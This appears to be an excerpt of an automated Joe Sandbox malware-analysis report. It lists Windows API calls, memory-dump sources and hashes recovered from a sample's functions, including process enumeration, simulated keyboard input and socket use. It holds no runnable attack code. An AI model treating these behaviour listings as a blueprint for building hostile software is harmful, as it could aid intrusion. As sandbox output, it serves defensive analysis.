                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                    • Opcode ID: f5902ab3b2e192b28b7cf5cca0837eaa4bd5c63718189f060599f7766654166a
                                                                                                                                                                                                                                                                                                    • Instruction ID: f0d5eda3bdbe15f0822b6a60be52a07d9ecd3e874d88559f67d10e38d5090112
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f5902ab3b2e192b28b7cf5cca0837eaa4bd5c63718189f060599f7766654166a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 61C16B75A0020AEFDB54DF94C894EAEB7B5FF48708F209598E409EB251D731EE85CB90
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                                                    • Instruction ID: cfc21554c8e7614006d393d0cc62b237e8d6864d53d5055d6a287a9d5dadf479
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EEA18BB29403859FDB11DF18C8917AEBBE0EF1131DF1459ADED95BB2D1C2388989C750
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00EC0BD4,?), ref: 00E80EE0
                                                                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00EC0BD4,?), ref: 00E80EF8
                                                                                                                                                                                                                                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,00EBDCE0,000000FF,?,00000000,00000800,00000000,?,00EC0BD4,?), ref: 00E80F1D
                                                                                                                                                                                                                                                                                                    • _memcmp.LIBVCRUNTIME ref: 00E80F3E
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 314563124-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 0051807bb4a290be84f12d560acf539c13e69c12159c06480dcdf9a7c8cf8077
                                                                                                                                                                                                                                                                                                    • Instruction ID: 64420e8578502c273bd473c9dc420bcafad39c95c9487b20fac272361c78e33e
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0051807bb4a290be84f12d560acf539c13e69c12159c06480dcdf9a7c8cf8077
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5810971A00109EFCB54DF94C984EEEB7B9FF89315F204558E51ABB250DB71AE0ACB60
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00EAB10C
                                                                                                                                                                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00EAB11A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2B329: _wcslen.LIBCMT ref: 00E2B333
                                                                                                                                                                                                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00EAB1FC
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00EAB20B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E3E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00E64D73,?), ref: 00E3E395
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1991900642-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: a7db84b9d44f809e8bbfd24faeaeff560461f7ebdc7c7555194cafdd3fccae92
                                                                                                                                                                                                                                                                                                    • Instruction ID: 60073dcde06fd8c6d5a049faf36811c243fe3a006373f7d618317542bdcc228b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7db84b9d44f809e8bbfd24faeaeff560461f7ebdc7c7555194cafdd3fccae92
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53513CB1508310AFD310EF24DC86A5BBBE8FF89754F40592DF585A7252EB70E905CB92
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: a2f24118c16ec18e4eb28fe1451fce70b7443708b81336ce60e9677284a5f766
                                                                                                                                                                                                                                                                                                    • Instruction ID: b5bc14b3c1def22b955451819bf65a60b6da4468c156c4460a93e4c8a6ef6187
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a2f24118c16ec18e4eb28fe1451fce70b7443708b81336ce60e9677284a5f766
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB415E31580100AFDB26BEBDBC42ABE36E4EF467B0F1C26E6F814F7191D634480152A1
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00EA255A
                                                                                                                                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00EA2568
                                                                                                                                                                                                                                                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00EA25E7
                                                                                                                                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00EA25F1
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorLast$socket
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1881357543-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: ec98d4641b6f48349d74208fe4496287e02a3b8c48940b1f73ceca91c7a15868
                                                                                                                                                                                                                                                                                                    • Instruction ID: f32efe93803735d9a9d3f231f4a8b383014b13257304c380b49215272599c156
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec98d4641b6f48349d74208fe4496287e02a3b8c48940b1f73ceca91c7a15868
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A41D134A00210AFE720AF24D886F2677E5AB49718F54D49CFA59AF3D2D772ED41CB90
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00EB6D1A
                                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00EB6D4D
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00EB6DBA
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3880355969-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5efc77100e15a69d744b5a8a83637235c9b7accfbc38eb7621c9b8bd71593691
                                                                                                                                                                                                                                                                                                    • Instruction ID: f793b1b167c86fc7fdd5919dc4fe3bb15f8a5ef7b1ce667ba97cf497a7f5f0d2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5efc77100e15a69d744b5a8a83637235c9b7accfbc38eb7621c9b8bd71593691
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8513A34A00209AFCF24DF64D8819EF7BB6FB84324F209559F915AB2A0D774EE81CB50
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00E961C8
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 00E961EE
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00E96213
                                                                                                                                                                                                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00E9623F
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3321077145-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00E8B473
                                                                                                                                                                                                                                                                                                    • SetKeyboardState.USER32(00000080), ref: 00E8B48F
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00E8B4FD
                                                                                                                                                                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00E8B54F
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 432972143-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00E8B5B8
                                                                                                                                                                                                                                                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00E8B5D4
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00E8B63B
                                                                                                                                                                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00E8B68D
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 432972143-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 00EB80D4
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00EB814A
                                                                                                                                                                                                                                                                                                    • PtInRect.USER32(?,?,?), ref: 00EB815A
                                                                                                                                                                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 00EB81C6
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1352109105-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 00EB2187
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E84393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E843AD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E84393: GetCurrentThreadId.KERNEL32 ref: 00E843B4
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E84393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E82F00), ref: 00E843BB
                                                                                                                                                                                                                                                                                                    • GetCaretPos.USER32(?), ref: 00EB219B
                                                                                                                                                                                                                                                                                                    • ClientToScreen.USER32(00000000,?), ref: 00EB21E8
                                                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 00EB21EE
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2759813231-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: cf2855bae277e9a866d539bf536a5a30ed60522ca694817a457bdfbcd06d3377
                                                                                                                                                                                                                                                                                                    • Instruction ID: f587ccdc498565f22354fc69762be6cab46e07aba6443bf9271e0f8ab02594a9
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cf2855bae277e9a866d539bf536a5a30ed60522ca694817a457bdfbcd06d3377
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C13150B1D01119AFCB04EFA9C8818EFBBF8EF48304B50906AE515F7311DA319E45CBA0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E241EA: _wcslen.LIBCMT ref: 00E241EF
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E8E8E2
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E8E8F9
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E8E924
                                                                                                                                                                                                                                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00E8E92F
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3763101759-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9168062a5805ac72546878e27acd4a9640b775499cdc9a83f82edc3c89671f1c
                                                                                                                                                                                                                                                                                                    • Instruction ID: c44a7c7b5082c3027a9770dd6b07f9ffc38b55111ce1749deb30e55fbba7e786
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9168062a5805ac72546878e27acd4a9640b775499cdc9a83f82edc3c89671f1c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0821B5B2D01214AFDB10BFA4D981BAEB7F8EF45750F1460A5E908BB381D6709E41C7A1
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,00EBDC30), ref: 00E8DBA6
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00E8DBB5
                                                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E8DBC4
                                                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00EBDC30), ref: 00E8DC21
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2267087916-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9a28d506d7b025ef6db375df488de301e1e3f5681beb277e0b1a195aa14eb62d
                                                                                                                                                                                                                                                                                                    • Instruction ID: d9b0bd38e6029c6f0d23d4cdbca408b4f0f76d265fd125f01cce663e9a31cbd8
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a28d506d7b025ef6db375df488de301e1e3f5681beb277e0b1a195aa14eb62d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A217E3114C2059F8700EF24DD8089BBBE8EF56368F101A19F49DE32E1E730D94ACB82
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00EB32A6
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00EB32C0
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00EB32CE
                                                                                                                                                                                                                                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00EB32DC
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
